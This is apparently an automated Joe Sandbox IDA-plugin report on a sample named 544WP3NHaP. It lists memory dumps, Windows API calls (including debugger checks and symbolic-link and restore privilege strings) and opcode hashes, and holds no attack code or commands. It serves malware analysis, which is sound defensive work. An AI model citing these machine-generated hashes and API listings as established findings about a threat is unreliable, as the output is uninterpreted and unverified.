                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                  • API String ID: 3983180755-3508440684
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog_swprintf
                                                                                                                                  • String ID: CMT$h%u$hc%u
                                                                                                                                  • API String ID: 146138363-3282847064
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A2874
                                                                                                                                  • _strlen.LIBCMT ref: 008A2E3F
                                                                                                                                    • Part of subcall function 008B02BA: __EH_prolog.LIBCMT ref: 008B02BF
                                                                                                                                    • Part of subcall function 008B1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008ABAE9,00000000,?,?,?,00010424), ref: 008B1BA0
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A2F91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                                  • String ID: CMT
                                                                                                                                  • API String ID: 1206968400-2756464174
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008BF844
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 008BF910
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008BF930
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 008BF93A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualQuery.KERNEL32(80000000,008BE5E8,0000001C,008BE7DD,00000000,?,?,?,?,?,?,?,008BE5E8,00000004,00901CEC,008BE86D), ref: 008BE6B4
                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,008BE5E8,00000004,00901CEC,008BE86D), ref: 008BE6CF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 401686933-2746444292
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 008C8FB5
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008C8FBF
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 008C8FCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 008BAF35
                                                                                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,008DE72C,?,?), ref: 008BAF84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2169056816-0
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(008A6DDF,00000000,00000400), ref: 008A6C74
                                                                                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 008A6C95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 0ac4e7b90b7b7e87619d41508f29c61226b3332f77ec855863001242f40fcc96
                                                                                                                                  • Instruction ID: 61fdf1ddd8f9887c7210d2a67f67a52f5a63805d174339df1d442352a9b4e7d7
                                                                                                                                  • Opcode Fuzzy Hash: 0ac4e7b90b7b7e87619d41508f29c61226b3332f77ec855863001242f40fcc96
                                                                                                                                  • Instruction Fuzzy Hash: 32D0C931345300BFFA110B618D06F2A7B9AFF56B61F18C505B795E84E0EA749824E62A
                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008D19EF,?,?,00000008,?,?,008D168F,00000000), ref: 008D1C21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: cb1fe2346b1d89cde5a107b0346f823cddf96c634c258ae422be132afc5af40c
                                                                                                                                  • Instruction ID: 7a0387428fcfea0dc05d0b0aa20072f71d69c310e547db8a3505bb7f91e3482f
                                                                                                                                  • Opcode Fuzzy Hash: cb1fe2346b1d89cde5a107b0346f823cddf96c634c258ae422be132afc5af40c
                                                                                                                                  • Instruction Fuzzy Hash: 34B15F31220608EFDB15CF28C48AB657BE0FF45364F25865AE899CF3A1C335E991CB40
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008BF66A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                  • Opcode ID: 857681b5846154c5cd677ea6fb52682d32febdc7d6bc553793b75317dd2a0c96
                                                                                                                                  • Instruction ID: a3b88f10d55cda4e1cdf5977c722be92975442154056139e6c6a816a7fb056aa
                                                                                                                                  • Opcode Fuzzy Hash: 857681b5846154c5cd677ea6fb52682d32febdc7d6bc553793b75317dd2a0c96
                                                                                                                                  • Instruction Fuzzy Hash: 2E518BB1A116098FEB29CF99EC817AEBBF4FB48314F24857AD505EB391D774A900CB50
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 008AB16B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Version
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                  • Opcode ID: f9a7d827284fc555d3a360ce6ed0b5c6a57deba18bc6dcc045ea24fe3ddca7f7
                                                                                                                                  • Instruction ID: 7a69d4978b20921fbbfc1f768be2f214770d36a23f626caa6578826429cd27c2
                                                                                                                                  • Opcode Fuzzy Hash: f9a7d827284fc555d3a360ce6ed0b5c6a57deba18bc6dcc045ea24fe3ddca7f7
                                                                                                                                  • Instruction Fuzzy Hash: AAF03AB4E00A488FDB18DB18EC966D973F1FB99315F10429AD51597390C7B0EDC0CE61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: gj
                                                                                                                                  • API String ID: 0-4203073231
                                                                                                                                  • Opcode ID: 147eef5d5f5063848d0ef1fecd966517055ef58848b24fe75370e3ccbfc4e3d4
                                                                                                                                  • Instruction ID: d78658bff7491afd3d46ccc1230ce203923e64aa5f53f293c65df1694dbd1854
                                                                                                                                  • Opcode Fuzzy Hash: 147eef5d5f5063848d0ef1fecd966517055ef58848b24fe75370e3ccbfc4e3d4
                                                                                                                                  • Instruction Fuzzy Hash: D5C147B2A183418FC354CF29D88065AFBE1BFC8308F19892EE998D7351D734E945DB96
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,008BF3A5), ref: 008BF9DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: a03c76ee60cc7e192948c5ae052302a98039dce177de849f98f47cc19764d8c1
                                                                                                                                  • Instruction ID: fc312e50d68c4ad90e3a7580277dabb71727e43e36a4c1ce0b5af9a7beec6b41
                                                                                                                                  • Opcode Fuzzy Hash: a03c76ee60cc7e192948c5ae052302a98039dce177de849f98f47cc19764d8c1
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                  • Opcode ID: 81aed1444964cb34966f7959f423e4dbcd38d83bddcd91ae910052ebfc41707b
                                                                                                                                  • Instruction ID: 49d987856718a9272979cb4462cad65069d62ee8584cd69a4443f7932b1633d2
                                                                                                                                  • Opcode Fuzzy Hash: 81aed1444964cb34966f7959f423e4dbcd38d83bddcd91ae910052ebfc41707b
                                                                                                                                  • Instruction Fuzzy Hash: 91A01130202202CFCB008F30AE0C2083BA8AA00280308002BA008C8020EA2080A0AA02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                  • Instruction ID: 249a715bbf6fb9e7c9df807bb158abddf6c0b5ddc7151cbb57f6a6f8bc54f272
                                                                                                                                  • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                  • Instruction Fuzzy Hash: B96291716047899FCB25CF28C4906F9BBE1FF95304F08896DD8AACB346E638E955CB11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: b59a614f6497238ba9928cbb3813312c65218a0e1f758627c4f122f6bd9c3756
                                                                                                                                  • Instruction ID: 4978667e82014dd53724c7298b36abf604b664aecad05c8529cf72b295402ede
                                                                                                                                  • Opcode Fuzzy Hash: b59a614f6497238ba9928cbb3813312c65218a0e1f758627c4f122f6bd9c3756
                                                                                                                                  • Instruction Fuzzy Hash: 80D19071A083458FDB14DF28C84479ABBE1FF89308F08456DE889DB342E778E919CB56
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 824374393fa54deeeb019bba2f1931abbbbcb6e911899b6d53097289205f3d2d
                                                                                                                                  • Instruction ID: 4ad5d1ae70033ae29c103d6ff5edd1a99cf657055d4ce0b59524a2ce09b1051a
                                                                                                                                  • Opcode Fuzzy Hash: 824374393fa54deeeb019bba2f1931abbbbcb6e911899b6d53097289205f3d2d
                                                                                                                                  • Instruction Fuzzy Hash: 8BE15B745083909FC304CF29D89086ABFF0BF9A350F46095EF9C497352D235E929DB92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                  • Instruction ID: 2cda1f48ff775169b7a2276a1dc60cef5cc83a5a09e36eb27732e36d3fbdd9d6
                                                                                                                                  • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                  • Instruction Fuzzy Hash: F79164B06007499BDB28EA68D892BFE77D4FBA5304F10092CE996C7383EB789545C352
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                  • Instruction ID: 240450480aab6a4bca773783b2ac63c89e85eb4b3f7dcbd15b16805b271ac5cb
                                                                                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                  • Instruction Fuzzy Hash: AA8147B13047465BEB38DE68C892BFD3790FBA1308F00193DE986CB783DA649985C756
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008AE30E
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                    • Part of subcall function 008B1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008E1030,00000200,008AD928,00000000,?,00000050,008E1030), ref: 008B1DC4
                                                                                                                                  • _strlen.LIBCMT ref: 008AE32F
                                                                                                                                  • SetDlgItemTextW.USER32(?,008DE274,?), ref: 008AE38F
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 008AE3C9
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 008AE3D5
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 008AE475
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 008AE4A2
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 008AE4DB
                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 008AE4E3
                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 008AE4EE
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 008AE51B
